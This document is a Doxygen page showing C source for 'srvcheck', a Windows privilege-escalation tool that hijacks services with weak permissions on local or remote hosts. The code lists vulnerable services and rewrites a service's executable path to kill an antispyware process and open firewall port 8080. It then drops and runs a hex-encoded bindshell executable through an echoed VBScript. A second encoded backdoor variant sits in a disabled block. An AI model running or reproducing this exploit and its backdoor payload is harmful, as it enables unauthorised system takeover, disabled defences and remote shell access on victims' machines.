C:/Web/srvcheck/srvcheck2/apireg.c

Go to the documentation of this file.
00001 /*
00002  * Privilege Scalation for Windows Networks using weak Service restrictions v2.0
00003  * (c) 2006 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
00004  * Date: February 6, 2006 - http://www.haxorcitos.com
00005  * http://microsoft.com/technet/security/advisory/914457.mspx
00006  *
00007  * ---------------------------------------
00008  * LIST OF WELL KNOWN VULNERABLE SERVICES
00009  * ---------------------------------------
00010  *
00011  * * Windows XP with sp2
00012  *  - As Power User:
00013  *    service: DcomLaunch ( SYSTEM )
00014  *    Service: UpnpHost ( Local Service )
00015  *    Service: SSDPSRV (Local Service)
00016  *    Service: WMI (SYSTEM) <- sometimes as user also..
00017  *  - As User:
00018  *    Service: UpnpHost ( Local Service )
00019  *    Service: SSDPSRV (Local Service)
00020  *  - As Network Config Operators:
00021  *    service: DcomLaunch ( SYSTEM )
00022  *    Service: UpnpHost ( Local Service )
00023  *    Service: SSDPSRV (Local Service)
00024  *    Service: DHCP ( SYSTEM )
00025  *    Service: NetBT (SYSTEM - .sys driver)
00026  *    Service DnsCache (SYSTEM)
00027  *
00028  * * Windows 2000
00029  *  - As Power user
00030  *    service: WMI (SYSTEM)
00031  *
00032  *  * Third Part software
00033  *    Service: [Pml Driver HPZ12] (HP Software - C:\WINNT\system32\spool\DRIVERS\W32X86\3\HPZipm12.exe)
00034  *    -Granted Full Control to Everyone Group.
00035   *    Service: [Autodesk Licensing Service] (Autocad - C:\program files\Common files\Autodesk Shared\Service\AdskScSrv.exe)
00036  *    -Maybe related to: http://www.securityfocus.com/bid/16472
00037  *    -Autodesk Multiple Products Remote Unauthorized Access Vulnerability
00038  *
00039  *
00040  * IMPORTANT!! You should execute this tool without Admin privileges on the target system
00041  *  srvcheck.exe -? for information about usage.
00042  *
00043  * NOTE: This code compiles under Borland C++ Builder
00044  *
00045 */
00046 #include <stdio.h>
00047 #include <windows.h>
00048 
00049 //Functions
00050 void doFormatMessage( unsigned int dwLastErr );
00051 void usage(void);
00052 DWORD StartModifiedService(SC_HANDLE SCM, char *srv, BOOL dbg);
00053 void ListVulnerableService(char *host);
00054 char *GetOwner(char *servicio);
00055 
00056 
00057 char init[]="cmd.exe /c rd /Q /S \\HXR";
00058 char antispyware[]="taskkill.exe  /IM gcasDtServ.exe";
00059 char firewall[]="cmd.exe /c netsh firewall add portopening TCP 8080 SrvCheck ENABLE ALL";
00060 
00061 
00062 char EncodedBackdoor[]=
00063 "cmd.exe /c md \\HXR && " //Thanks to Miguel Tarasco for his Vbs-Encoder and this small backdoor
00064 "echo f=\"4D5A900003z3z04z3z504500004C01020046534721z8zE0000F010B01z3z04z3z06z6z3F43z3z1000000Cz5z40000010z3z02000004z7z04z8z50z3z\">\\HXR\\a.vbs && "
00065 "echo f=f ^&\"02z6z02z5z10000010z4z10000010z6z10z11z0444000034z119z74z4z30z3z10z22zE00000C0z4z7461z3z10z3z4000003804z3z02z14zE00000C04B\">>\\HXR\\a.vbs && "
00066 "echo f=f ^& \"45524E454C33322E646C6Cz3z4C6F61644C69627261727941000047657450726F6341646472657373z25zFA434000EE434000F0434000980140000010\">>\\HXR\\a.vbs && "
00067 "echo f=f ^& \"40000040400001204000013040z5z7A21400001z3z2C4440z57z551C8BEC818E24021C1E53405D0856578D4501C033F6BF183040C050C7DD16F72E0C\">>\\HXR\\a.vbs && "
00068 "echo f=f ^& \"0EC44403893275C806CC07D0935DD41026E009CFE4A47DE80CD806DC80ECFF18154C206E5653E5CDB81380CB5033046810CF83576F2236B1078D85DC\">>\\HXR\\a.vbs && "
00069 "echo f=f ^& \"FDAF792A02B2DD246C2D34C86A06E401E802C81E708668901F34188BD866C0F002C845744FAF89ACF21658886A1081F4E714080850A53AF032532A5C\">>\\HXR\\a.vbs && "
00070 "echo f=f ^& \"1101911360298D18446450CE32F81268236A443DEE6CC05BA09850E8414FB38F4EB02219431883C4181B899DA3210AD2759C502C4EF4988C01086849\">>\\HXR\\a.vbs && "
00071 "echo f=f ^& \"10087C8198F3EC10EB32A406A806ACB044085F075E5BC9C21007CCE725DD1D53466AD1688048C4D063120A64A151BB42DC8925A00883EC6768FA57C0\">>\\HXR\\a.vbs && "
00072 "echo f=f ^& \"65E833DB903D52FCED22400D59830D30BFF7210E34322A14278BD62C1B3289081C1819280CA151380DC1A3DF151DE8108C0C391D1C17751B0C68C2DB\">>\\HXR\\a.vbs && "
00073 "echo f=f ^& \"2258101859E8E2D7680CDD3154082831CD1FA124150A3294E5398650FF35201BD114E57E669009A02429151CB11404337084489A13C724A1CA6F3AC8\">>\\HXR\\a.vbs && "
00074 "echo f=f ^& \"10078C803E22533A461D138A06C3C374043C281CF213F30F0A2076F2D519D09EA417089EF6BE830174110FB7B8D4EB0ED9583CD8472CB0F56A0A5890\">>\\HXR\\a.vbs && "
00075 "echo f=f ^& \"5649539D2204A17D86350903989822692C7A8B73EC75080009894D885051E80FA98559C5C3FE402FFF756488402454642A28064534245303A2058206\">>\\HXR\\a.vbs && "
00076 "echo f=f ^& \"E817902A33C0E7D1CC5D01954C442C4199DBz3zAF01F644FF843812403698080000AD0180636D642E6578E5C0576F7070600100011C58204001575332\">>\\HXR\\a.vbs && "
00077 "echo f=f ^& \"5F33CC2E64716CE1C108C285010248060D6401320319730859395341036F636B6574BE1854092210C08B4D5356435243540C615F733A75C708726DAE\">>\\HXR\\a.vbs && "
00078 "echo f=f ^& \"ED680CDF392370737E663E6F64D20B3D637CA60D6C67524A69796E7972CFB66F9EF6712AEE7861690D586370F146E56CEB7080556711C4636DC8BA6E\">>\\HXR\\a.vbs && "
00079 "echo f=f ^& \"365C1CDF2D7125646ABECC6EB2E669761ACFA86E6E728F6CAA707F4E9DBCEED2CF79DEA8507663DF985E685B6E802A7033D188AF4B4539524EAB4CF6\">>\\HXR\\a.vbs && "
00080 "echo f=f ^& \"99496053CA8884B41E70826E666F4185104D1FA0B25C48AC3422457B72A3CBF35067C094731C1E01634C855553438640025465676973A79443C6613E\">>\\HXR\\a.vbs && "
00081 "echo f=f ^& \"2B4578301457AB0A646F7710180200BEA4014000AD93AD97AD5696B280A4B680FF1373F933C9FF13731633C0FF13731FB68041B010FF1312C073FA75\">>\\HXR\\a.vbs && "
00082 "echo f=f ^& \"3CAAEBE0FF530802F683D901750EFF5304EB26ACD1E8742F13C9EB1A9148C1E008ACFF53043D007D0000730A80FC05730683F87F77024141958BC5B6\">>\\HXR\\a.vbs && "
00083 "echo f=f ^& \"00568BF72BF0F3A45EEB9D8BD65EAD48740A7902AD50568BF297EB87AD935E46AD9756FF1395AC84C075FBFE0E74F0790546AD50EB09FE0E0F8460CD\">>\\HXR\\a.vbs && "
00084 "echo f=f ^& \"FFFF5655FF5304ABEBE033C941FF1313C9FF1372F8C302D275058A164612D2C32C44z10z540100002C44z22z610100006F01z14z\">>\\HXR\\a.vbs && "
00085 "echo i=1 : t = \"\" : While i^<=len(f) : If mid(f,i,1) = \"z\" then>>\\HXR\\a.vbs && "
00086 "echo a=i+1 : k = 0 : while mid(f,a,1)^<^>\"z\" : k = k*10 + mid(f,a,1) : a = a+1 : WEnd : i = a+1 : for a=1 to k : t = t + \"00\" : Next>>\\HXR\\a.vbs && "
00087 "echo ElseIf mid(f,i,1) ^<^> \"z\" then : t = t ^& mid(f,i,2) : i = i+2 >>\\HXR\\a.vbs && "
00088 "echo end if : WEnd : Set o = CreateObject(\"Scripting.FileSystemObject\") >>\\HXR\\a.vbs && "
00089 "echo Set n = o.CreateTextFile(\"\\HXR\\a.exe\", ForWriting) : i = 1 : while i ^< len(t)>>\\HXR\\a.vbs && "
00090 "echo f = Int(\"&H\" ^& Mid(t, i, 2)) : n.Write(Chr(f)) : i = i+2 : WEnd : n.Close>>\\HXR\\a.vbs && "
00091 "echo Set s=CreateObject(\"WScript.Shell\") : s.run(\"\\HXR\\a.exe\")>>\\HXR\\a.vbs &&"
00092 "\\HXR\\a.vbs /B";
00093 
00094 //Globals
00095 
00096 BYTE LIST=0,HELP=0,BACKDOOR=1, STOP=0;
00097 char RemoteHost[256];
00098 char permission[256];
00099 
00100 /******************************************************************************/
00101 int main(int argc, char* argv[]) {
00102 
00103  SC_HANDLE SCM,Svc;
00104  DWORD ret,len;
00105  char CurrentUserName[256];
00106  char *newPath=NULL;
00107  char *host=NULL;
00108  char *user=NULL;
00109  char *pass=NULL;
00110  char *srv=NULL;
00111  int i;
00112  NETRESOURCE NET;
00113   SERVICE_STATUS_PROCESS StopStatus;
00114 
00115  printf(" Services Permissions checker v2.0\n");
00116  printf(" (c) 2006 Andres Tarasco - atarasco%cgmail.com\n\n",'@');
00117 
00118  if (argc==1) usage();
00119  for (i=1;i<argc;i++) {
00120     if ( (strlen(argv[i])==2) && (argv[i][0]=='-') ) {
00121         switch (argv[i][1]) {
00122             case 'l': LIST=1; break;
00123             case 'm': srv=argv[i+1]; i=i+1;break;
00124             case 'u': if (!host) usage(); user=argv[i+1]; i=i++; break;
00125             case 'p': if (!host) usage(); pass=argv[i+1]; i=i++; break;
00126             case 'H': host=argv[i+1]; i=i++; break;
00127             case 'c': newPath=argv[i+1]; i=i+1; BACKDOOR=0; break;
00128             case 's': STOP=1; break;
00129             case '?': HELP=1; usage(); break;
00130             default: printf("Unknown Parameter: %s\n",argv[i]);usage(); break;
00131         }
00132     }
00133  }
00134 
00135  if ((!LIST) && (!srv) )usage();
00136 
00137  if (host) { //Inicialización.. Conexión al sistema remoto..
00138     printf("[+] Trying to connect to remote SCM\n");
00139     sprintf(RemoteHost,"\\\\%s\\IPC$",host);
00140     printf("[+] Host: %s\n",RemoteHost);
00141     printf("[+] Username: %s\n",user);
00142     printf("[+] Password: %s\n",pass);
00143 
00144     NET.dwType = RESOURCETYPE_ANY;
00145     NET.lpProvider = NULL;
00146     NET.lpLocalName=NULL;
00147     NET.lpRemoteName = (char *)RemoteHost;
00148     ret=WNetAddConnection2(&NET,pass,user,CONNECT_COMMANDLINE);//CONNECT_PROMPT);//CONNECT_UPDATE_PROFILE);
00149 
00150     //verificación de errores de conexión...
00151     if ( (ret!=NO_ERROR) && (user !=NULL) ) {
00152         if (ret==1219) { //connection already created. Disconnecting..
00153             printf("[-] Credentials mismatch. Removing old connection\n"); 
00154             WNetCancelConnection2(RemoteHost,NULL,TRUE);
00155             ret=WNetAddConnection2(&NET,pass,user,CONNECT_UPDATE_PROFILE);
00156         } else {
00157             if (ret==1326) { //usuario o contraseña incorrecta
00158              if (strchr(user,'\\')==NULL) {
00159                  sprintf(CurrentUserName,"localhost\\%s",user);
00160                 printf("[-] Unknown Username or password\n");
00161                 printf("[+] Trying \"%s\" as new username\n",CurrentUserName);
00162                 ret=WNetAddConnection2(&NET,pass,CurrentUserName,CONNECT_UPDATE_PROFILE);
00163              }
00164             }
00165         }
00166         if (ret!=NO_ERROR) {
00167             printf("WNetAddConnection Failed to %s (%s/ %s)\n",RemoteHost,user,pass);
00168             doFormatMessage(GetLastError());
00169             exit(-1);
00170         }
00171     }
00172     printf("[+] Network Connection OK\n");
00173 
00174  } else {
00175     printf("[+] Trying to enumerate local resources\n");
00176     len=sizeof(CurrentUserName)-1;
00177     GetUserName(  CurrentUserName,&len);
00178     printf("[+] Username: %s\n",CurrentUserName);
00179  }
00180 
00181 
00182 if (LIST) {
00183     ListVulnerableService(host);
00184     exit(1);
00185 }
00186 
00187 //SERVICE HACKS HERE!!
00188 
00189 
00190 SCM = OpenSCManager(host,NULL,STANDARD_RIGHTS_WRITE | SERVICE_START );
00191 if (!SCM){
00192     printf("[-] OpenScManager() FAILED\n");
00193     doFormatMessage(GetLastError());
00194     exit(-1);
00195 }
00196 if (STOP) {
00197     Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE | SERVICE_STOP);
00198 } else {
00199     Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);
00200 }
00201 
00202 if (Svc==NULL) {
00203     printf("[-] Unable to open Service %s\n",srv);
00204     exit(-1);
00205 }
00206 
00207 //        printf("[+] Using leetz skillz to execute backdoor =)\n");
00208 
00209 //Delete previous installed
00210 
00211 if (STOP) {
00212  printf("[+] Stopping previously running instances...\n");
00213  if (ControlService(Svc,SERVICE_CONTROL_STOP,&StopStatus)!=0) {
00214     doFormatMessage(GetLastError());
00215 
00216  }
00217  exit(-1);
00218 }
00219 
00220 
00221  if (BACKDOOR) {
00222     printf("[+] Uninstalling previous backdoors\n");
00223     ret=ChangeServiceConfig(
00224         Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
00225         SERVICE_ERROR_IGNORE,init,NULL,NULL,"",
00226         NULL,NULL,NULL);
00227 
00228         if (ret!=0) StartModifiedService(SCM,srv,0);
00229 
00230     printf("[+] Granting Remote bindshell Execution..\n");
00231     ret=ChangeServiceConfig(
00232         Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
00233         SERVICE_ERROR_IGNORE,firewall,NULL,NULL,"",
00234         NULL,NULL,NULL);
00235         if (ret!=0) StartModifiedService(SCM,srv,0);
00236     printf("[+] Shutting down remote antispyware Service =)\n");
00237     ret=ChangeServiceConfig(
00238         Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
00239         SERVICE_ERROR_IGNORE,antispyware,NULL,NULL,"",
00240         NULL,NULL,NULL);
00241         if (ret!=0) StartModifiedService(SCM,srv,0);
00242     printf("[+] Installing Backdoor Code...\n");
00243     ret=ChangeServiceConfig(
00244         Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
00245         SERVICE_ERROR_IGNORE,EncodedBackdoor,NULL,NULL,"",
00246         NULL,NULL,NULL);
00247  } else { //Ejecutando parametros especificados con -c
00248     printf("[+] Sending custom commands to the service\n");
00249     ret=ChangeServiceConfig(
00250         Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
00251         SERVICE_ERROR_IGNORE,newPath,NULL,NULL,"",
00252         NULL,NULL,NULL);
00253  }
00254 
00255  if (ret!=0) {
00256     printf("[+] The service have been succesfully modified =)\n");
00257     CloseServiceHandle(Svc);
00258     StartModifiedService(SCM,srv,1);
00259  } else {
00260     printf("[-] Service modification Failed\n");
00261     doFormatMessage(ret);
00262  }
00263  CloseServiceHandle(SCM);
00264  if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
00265  return(1);
00266 }
00267 
00268 /******************************************************************************/
00269 void doFormatMessage( unsigned int dwLastErr )  {
00270     LPVOID lpMsgBuf;
00271     FormatMessage(
00272         FORMAT_MESSAGE_ALLOCATE_BUFFER |
00273         FORMAT_MESSAGE_IGNORE_INSERTS |
00274         FORMAT_MESSAGE_FROM_SYSTEM,
00275         NULL,
00276         dwLastErr,
00277         MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
00278         (LPTSTR) &lpMsgBuf,
00279         0,
00280         NULL );
00281     printf("ErrorCode %i: %s\n", dwLastErr, lpMsgBuf);
00282     LocalFree( lpMsgBuf  );
00283 }
00284 
00285 /******************************************************************************/
00286 
00287 DWORD StartModifiedService(SC_HANDLE SCM, char *srv, BOOL dbg) {
00288 
00289  SC_HANDLE Svc;
00290  DWORD Error;
00291  SERVICE_STATUS_PROCESS StartStatus;
00292  DWORD dwByteNeeded;
00293 
00294  DWORD dwOldCheckPoint;
00295  DWORD dwStartTickCount;
00296  DWORD dwWaitTime;
00297 
00298  Svc= OpenService( SCM, srv, SERVICE_ALL_ACCESS);
00299 
00300  if (Svc==NULL) {
00301     if (dbg) printf("[-] Unable to reopen service for starting..\n");
00302     return(-1);
00303  } else {
00304     if (dbg) printf("[+] Service Opened. Trying to Start... (wait a few seconds)\n");
00305  }
00306 
00307  if (!StartService(Svc,0,NULL)) {
00308     Error=GetLastError();
00309     if (Error==1053) {
00310         if (dbg) {
00311             printf("[+] StarteService() Error due to a non service application execution\n");
00312             printf("[+] Ignore it. Your application should be executed =)\n");
00313             if (BACKDOOR) {
00314                 printf("[+] Now connect to port 8080 and enjoy your new privileges\n");
00315             }
00316         }
00317     } else {
00318         if (dbg) {
00319             printf("[-] Unable to start Service :/\n");
00320             doFormatMessage(Error);
00321         }
00322         return(Error);
00323     }
00324 
00325  } else {
00326         if (dbg) printf("[+]  Starting Service....\n");
00327         if (!QueryServiceStatusEx(
00328             Svc,             // handle to service
00329             SC_STATUS_PROCESS_INFO, // info level
00330             &StartStatus,              // address of structure
00331             sizeof(SERVICE_STATUS_PROCESS), // size of structure
00332             &dwByteNeeded) )              // if buffer too small
00333         {
00334             if (dbg) printf("[-] Unable to QueryServiceStatusEx() \n");
00335             return(-2);
00336         } else {
00337 
00338             //Revisión de si arranca el servicio..
00339             // Save the tick count and initial checkpoint.
00340             dwStartTickCount = GetTickCount();
00341             dwOldCheckPoint = StartStatus.dwCheckPoint;
00342             while (StartStatus.dwCurrentState == SERVICE_START_PENDING)
00343             {
00344                 if (dbg) printf("Wait Time: %i\n",StartStatus.dwWaitHint);
00345                 dwWaitTime = StartStatus.dwWaitHint  / 10;
00346                 if( dwWaitTime < 1000 )
00347                     dwWaitTime = 1000;
00348                 else if ( dwWaitTime > 10000 )
00349                     dwWaitTime = 10000;
00350                 Sleep( dwWaitTime );
00351                 // Check the status again.
00352 
00353                 if (!QueryServiceStatusEx(
00354                     Svc,             // handle to service
00355                     SC_STATUS_PROCESS_INFO, // info level
00356                     &StartStatus,              // address of structure
00357                     sizeof(SERVICE_STATUS_PROCESS), // size of structure
00358                     &dwByteNeeded ) )              // if buffer too small
00359                 {
00360                     if (dbg) printf("[-] Unable to QueryServiceStatusEx() \n");
00361                     return(-2);
00362                 }
00363                 if ( StartStatus.dwCheckPoint > dwOldCheckPoint )
00364                 {
00365                 // The service is making progress.
00366                     dwStartTickCount = GetTickCount();
00367                     dwOldCheckPoint = StartStatus.dwCheckPoint;
00368                 } else {
00369                     if(GetTickCount()-dwStartTickCount > StartStatus.dwWaitHint)
00370                     {
00371                         // No progress made within the wait hint
00372                         if (dbg) printf("el servicio no se ha arrancado...\n");
00373                         break;
00374                     }
00375                 }
00376             }
00377         }
00378         CloseServiceHandle(Svc);
00379         if (StartStatus.dwCurrentState == SERVICE_RUNNING)
00380         {
00381             if (dbg) printf("[+] StartService SUCCESS.\n");
00382             return 1;
00383         }
00384         else
00385         {
00386             if (dbg) printf("\n[-] Service not started. \n");
00387         }
00388   }
00389   return(0);
00390 }
00391 
00392 
00393 /******************************************************************************/
00394 /******************************************************************************/
00395 void usage(void) {
00396     printf(" Usage:\n\t-l\t\t list vulnerable services\n");
00397     printf("\t-m <service>\t modify the configuration for that service\n");
00398     printf("\t-c <command>\t Command to execute throw remote service\n");
00399     printf("\t\t\t  by default. bindshell application will be used\n");
00400     printf("\t-H <Host>\t specify a remote host to connect ip/netbiosname)\n");
00401     printf("\t-u <user>\t if not seletected Default logon credentials used)\n");
00402     printf("\t-p <password>\t if not used Default logon credentials used)\n");
00403     printf("\t-?\t\t Extended information with samples\n");
00404 
00405     if (HELP) {
00406      printf(" examples:\n");
00407      printf("\tsrvcheck.exe -l (list local vulnerabilities)\n");
00408      printf("\tsrvcheck.exe -m service (spawn a shell at port 8080)\n");
00409      printf("\tsrvcheck.exe -m service -c \"cmd.exe /c md c:\\PWNED\"\n"),
00410      printf("\tsrvcheck -l -H host (list remote vulnerabilities)\n");
00411    }
00412    exit(-1);
00413 }
00414 
00415 
00416 /******************************************************************************/
00417 void ListVulnerableService(char *host) {
00418  SC_HANDLE SCM;
00419  SC_HANDLE Svc;
00420  DWORD nResumeHandle;
00421  DWORD dwServiceType;
00422  LPENUM_SERVICE_STATUS_PROCESS lpServices;
00423  DWORD nSize = 0;
00424  DWORD nServicesReturned;
00425  unsigned int n;
00426  unsigned int l=0;
00427  DWORD dwByteNeeded;
00428  LPQUERY_SERVICE_CONFIG lpConfig;
00429  char *p;
00430 
00431     SCM = OpenSCManager(host,NULL,SC_MANAGER_ENUMERATE_SERVICE);
00432     if (!SCM){
00433         printf("[-] OpenScManager() FAILED\n");
00434         doFormatMessage(GetLastError());
00435         exit(-1);
00436     }
00437     nResumeHandle = 0;
00438     dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;
00439     lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);
00440     if (!lpServices) {
00441         printf("[-] CRITICAL ERROR: LocalAlloc() Failed\n");
00442         exit(-1);
00443     }
00444     memset(lpServices,'\0',sizeof(lpServices));
00445     if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
00446         dwServiceType, SERVICE_STATE_ALL,
00447         (LPBYTE)lpServices, 65535,
00448         &nSize, &nServicesReturned,
00449         &nResumeHandle, NULL) == 0)
00450     {
00451         printf("EnumServicesStatusEx FAILED\n");
00452         exit(-1);
00453     }
00454 
00455     printf("[+] Listing Vulnerable Services...\n");
00456     for (n = 0; n < nServicesReturned; n++) {
00457         Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
00458         if (Svc!=NULL) {
00459             l++;
00460             printf("\n    [%s]\t\t%s\n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
00461             printf("    Status: 0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
00462             if (!host) {
00463                 p=GetOwner(lpServices[n].lpServiceName);
00464                 if (p) {
00465                     printf("    Context:\t\t%s\n",p);
00466                 } 
00467             }
00468                 dwByteNeeded = 0;
00469                     lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024*8);
00470                     if (QueryServiceConfig(Svc, lpConfig, 1024*8, &dwByteNeeded)!=0) {
00471                 printf("    Parameter:\t\t%s\n",lpConfig->lpBinaryPathName);
00472             }else {
00473                 doFormatMessage(GetLastError());
00474             }
00475         }
00476     }
00477     printf("\n[+] Analyzed %i Services in your system\n",nServicesReturned);
00478     if (l>0) {
00479         printf("[+] You were Lucky. %i vulnerable services found\n",l);
00480     }   else {
00481         printf("[+] Your system is secure! Great! :/\n");
00482     }
00483      if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
00484     CloseServiceHandle(SCM);
00485     LocalFree(lpServices);
00486     exit(1);
00487 }
00488 
00489 /*****************************************************************************/
00490 
00491 char *GetOwner(char *servicio) {
00492 
00493  char path[256];
00494  HKEY hReg;
00495  DWORD len=sizeof(permission);
00496 
00497  sprintf(path,"SYSTEM\\CurrentControlSet\\Services\\%s",servicio);
00498  if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,path,0,KEY_QUERY_VALUE,&hReg)== ERROR_SUCCESS ) {
00499     if (RegQueryValueEx(hReg,"ObjectName",NULL,NULL,permission,&len)==ERROR_SUCCESS) {
00500         RegCloseKey(hReg);
00501         return(permission);
00502     }
00503     RegCloseKey(hReg);
00504  }
00505  return(NULL);
00506 }
00507 
00508 
00509 
00510 
00511 
00512 #if 0
00513 
00514 
00515 char init[]="cmd.exe /c rd /Q /S \\srvcheck";
00516 char antispyware[]="taskkill.exe  /IM gcasDtServ.exe";
00517 char firewall[]="netsh firewall add portopening TCP 8080 SrvCheck";
00518 
00519 char EncodedBackdoor[]=
00520 "cmd.exe /c md \\srvcheck && "
00521 "echo f=\"4D5A900003z3z04z3z504500004C010100188AEC3Fz8zE0000F010B0106000002z10z2810z3z1000000Cz5z40000010z3z02000004z7z04z8z20z3z02\">\\srvcheck\\a.vbs && "
00522 "echo f=f ^& \"z6z02z5z10000010z4z10000010z6z10z11z041100003Cz84z10000020z27z2E74657874z3z9A01z3z1000009C01z3z02z14z200000E010z11z041100\">>\\srvcheck\\a.vbs && "
00523 "echo f=f ^& \"003Cz51z436865636B73756D20526F636B7A2121z17z10000020z27z2E74657874z3z9A01z3z10z3z02z3z02z14z200000E0z40z6011z6z0D00008002\">>\\srvcheck\\a.vbs && "
00524 "echo f=f ^& \"000080801100007300008001000080z4z636D642E65786500558BEC81ECF801000053568D8508FEFFFF57506802020000FF151410400033F65656566A\">>\\srvcheck\\a.vbs && "
00525 "echo f=f ^& \"066A016A02FF15101040008BD883FBFF0F8499z3z8D45EC6A10505366C745EC02008975F066C745EE1F90FF150C10400083F8FF740C68FFFFFF7F53FF\">>\\srvcheck\\a.vbs && "
00526 "echo f=f ^& \"150810400033C08D7DDCABABABAB8D45FC66C745DC0200508D45DC5053C745FC10z3zFF15181040008BD083FAFF74406A1133C0598D7D98F3AB8D45EC\">>\\srvcheck\\a.vbs && "
00527 "echo f=f ^& \"C7459844z3z508D459850565668400000086A015656682010400056C745C4000100008955D88955D48955D0FF15001040005F5E33C05BC9C210004011\">>\\srvcheck\\a.vbs && "
00528 "echo f=f ^& \"z10z7211z3z1000004811z10z8E1100000810z22z6011z6z0D00008002000080801100007300008001000080z4z470043726561746550726F63657373\">>\\srvcheck\\a.vbs && "
00529 "echo f=f ^& \"4100004B45524E454C33322E646C6C00003D00575341536F636B65744100005753325F33322E646C6Cz4z\">>\\srvcheck\\a.vbs && "
00530 "echo i=1 : t = \"\" : While i^<=len(f) : If mid(f,i,1) = \"z\" then>>\\srvcheck\\a.vbs && "
00531 "echo a=i+1 : k = 0 : while mid(f,a,1)^<^>\"z\" : k = k*10 + mid(f,a,1) : a = a+1 : WEnd : i = a+1 : for a=1 to k : t = t + \"00\" : Next>>\\srvcheck\\a.vbs && "
00532 "echo ElseIf mid(f,i,1) ^<^> \"z\" then : t = t ^& mid(f,i,2) : i = i+2 >>\\srvcheck\\a.vbs && "
00533 "echo end if : WEnd : Set o = CreateObject(\"Scripting.FileSystemObject\") >>\\srvcheck\\a.vbs && "
00534 "echo Set n = o.CreateTextFile(\"\\srvcheck\\a.exe\", ForWriting) : i = 1 : while i ^< len(t)>>\\srvcheck\\a.vbs && "
00535 "echo f = Int(\"&H\" ^& Mid(t, i, 2)) : n.Write(Chr(f)) : i = i+2 : WEnd : n.Close>>\\srvcheck\\a.vbs && "
00536 "echo Set s=CreateObject(\"WScript.Shell\") : s.run(\"\\srvcheck\\a.exe\")>>\\srvcheck\\a.vbs &&"
00537 "\\srvcheck\\a.vbs /B";
00538 //"taskkill.exe  /IM gcasDtServ.exe && \\srvcheck\\a.vbs /B";
00539 
00540 #endif
Generated on Fri Feb 22 11:56:20 2008 for Srvcheck by  doxygen 1.5.4